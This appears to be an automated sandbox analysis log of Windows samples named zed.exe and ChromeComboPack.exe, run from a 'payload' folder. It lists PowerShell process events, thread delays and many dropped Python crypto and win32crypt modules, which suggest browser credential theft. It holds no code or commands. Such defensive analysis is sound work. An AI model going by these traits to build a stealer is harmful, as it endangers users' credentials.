Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD344D27D5 sldt word ptr [eax]

0_2_00007FFD344D27D5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5348	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4439	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2067	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 840
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2384

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\select.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\python312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\python3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\python312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\win32\win32crypt.pyd	Jump to dropped file
